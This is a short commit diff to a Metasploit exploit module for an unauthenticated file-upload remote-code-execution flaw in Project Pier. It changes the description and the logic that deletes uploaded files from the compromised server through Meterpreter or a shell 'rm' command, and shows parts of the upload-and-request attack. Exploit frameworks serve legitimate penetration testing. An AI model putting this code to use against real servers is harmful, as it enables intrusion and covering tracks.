Make cleanup work better

Author: sinn3r

modules/exploits/unix/webapp/projectpier_upload_exec.rb

@@ -20,9 +20,8 @@ def initialize(info={})
 					This module exploits a vulnerability found in Project Pier.  The application's
 				uploading tool does not require any authentication, which allows a malicious user
 				to upload an arbitrary file onto the web server, and then cause remote code
-				execution by simply requesting it. This module is known to work against Apache
-				servers due to the way it handles an extension name, but the vulnerability may
-				not be exploitable on others.
+				execution by simply requesting it.  Please note this module only works best against
+				an Apache server due to the way it handle an extension name.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@@ -96,15 +95,16 @@ def on_new_session(cli)
 		end
 
 		@clean_files.each do |f|
-			print_status("#{@peer} - Remove: #{f}")
+			print_debug("#{@peer} - Removing: #{f}")
 			begin
 				if cli.type == 'meterpreter'
 					cli.fs.file.rm(f)
 				else
 					cli.shell_command_token("rm #{f}")
 				end
+				print_debug("File removed: #{f}")
 			rescue ::Exception => e
-				vprint_error("#{@peer} - Unable to remove #{f}: #{e.message}")
+				print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
 			end
 		end
 	end
@@ -132,6 +132,7 @@ def exec_php(base, body)
 		# Body example:
 		# 0 ./upload/test/test.txt-0001
 		uri = body.scan(/(\/.+$)/).flatten[0]
+		@clean_files << File.basename(uri)
 
 		res = send_request_raw({'uri' => "#{base}/tools#{uri}"})
 
@@ -151,7 +152,7 @@ def exploit
 
 		folder_name = Rex::Text.rand_text_alpha(4)
 		php_fname = "#{Rex::Text.rand_text_alpha(5)}.php.1"
-		@clean_files = [php_fname]
+		@clean_files = []
 
 		case target['Platform']
 		when 'php'